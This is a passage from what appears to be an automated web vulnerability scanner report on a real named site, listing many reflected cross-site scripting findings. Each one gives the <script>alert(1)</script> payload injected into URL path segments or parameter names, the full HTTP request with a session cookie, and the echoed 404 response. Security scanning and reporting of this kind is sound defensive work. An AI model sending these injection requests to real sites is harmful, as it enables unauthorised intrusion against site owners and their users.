Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes6aa43<script>alert(1)</script>78be1019b22/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4027. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4d6bd<script>alert(1)</script>5de06f17c1a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos4d6bd<script>alert(1)</script>5de06f17c1a/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos4d6bd<script>alert(1)</script>5de06f17c1a/images/review/ was not found on this server.</p>
...[SNIP]...

2.4028. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 33d0f<script>alert(1)</script>775de27bebc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images33d0f<script>alert(1)</script>775de27bebc/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images33d0f<script>alert(1)</script>775de27bebc/review/ was not found on this server.</p>
...[SNIP]...

2.4029. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8e544<script>alert(1)</script>158719c9c89 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/review8e544<script>alert(1)</script>158719c9c89/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review8e544<script>alert(1)</script>158719c9c89/ was not found on this server.</p>
...[SNIP]...

2.4030. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c5d4a<script>alert(1)</script>6322bbe0db8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/?c5d4a<script>alert(1)</script>6322bbe0db8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/?c5d4a<script>alert(1)</script>6322bbe0db8=1 was not found on this server.</p>
...[SNIP]...

2.4031. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b6178<script>alert(1)</script>370f24fc406 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-informationb6178<script>alert(1)</script>370f24fc406/ebooks/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-informationb6178<script>alert(1)</script>370f24fc406/ebooks/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4032. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9d65d<script>alert(1)</script>73c90242793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks9d65d<script>alert(1)</script>73c90242793/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks9d65d<script>alert(1)</script>73c90242793/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4033. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff7dc<script>alert(1)</script>e4f9e493fde was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themesff7dc<script>alert(1)</script>e4f9e493fde/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themesff7dc<script>alert(1)</script>e4f9e493fde/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4034. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4a7ae<script>alert(1)</script>4837ed48d66 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos4a7ae<script>alert(1)</script>4837ed48d66/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos4a7ae<script>alert(1)</script>4837ed48d66/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4035. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4329a<script>alert(1)</script>634363f5a54 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images4329a<script>alert(1)</script>634363f5a54/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images4329a<script>alert(1)</script>634363f5a54/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4036. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 21236<script>alert(1)</script>137a85fad0a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/review21236<script>alert(1)</script>137a85fad0a/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:54:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review21236<script>alert(1)</script>137a85fad0a/0.gif was not found on this server.</p>
...[SNIP]...

2.4037. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload dbf6c<script>alert(1)</script>34986f3169 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/0.gifdbf6c<script>alert(1)</script>34986f3169 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:54:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/0.gifdbf6c<script>alert(1)</script>34986f3169 was not found on this server.</p>
...[SNIP]...

2.4038. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a7c2a<script>alert(1)</script>541b77bad72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/0.gif?a7c2a<script>alert(1)</script>541b77bad72=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/0.gif?a7c2a<script>alert(1)</script>541b77bad72=1 was not found on this server.</p>
...[SNIP]...

2.4039. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ea3f<script>alert(1)</script>687925da9b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information7ea3f<script>alert(1)</script>687925da9b9/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information7ea3f<script>alert(1)</script>687925da9b9/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4040. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c530<script>alert(1)</script>46bb86e2c30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks7c530<script>alert(1)</script>46bb86e2c30/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks7c530<script>alert(1)</script>46bb86e2c30/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4041. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 499a4<script>alert(1)</script>5a1179c9690 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes499a4<script>alert(1)</script>5a1179c9690/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes499a4<script>alert(1)</script>5a1179c9690/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4042. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2c5c5<script>alert(1)</script>268b550fcb8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos2c5c5<script>alert(1)</script>268b550fcb8/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos2c5c5<script>alert(1)</script>268b550fcb8/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4043. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 91ece<script>alert(1)</script>81895c97131 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images91ece<script>alert(1)</script>81895c97131/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images91ece<script>alert(1)</script>81895c97131/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4044. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a445f<script>alert(1)</script>9167522d4d3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/reviewa445f<script>alert(1)</script>9167522d4d3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
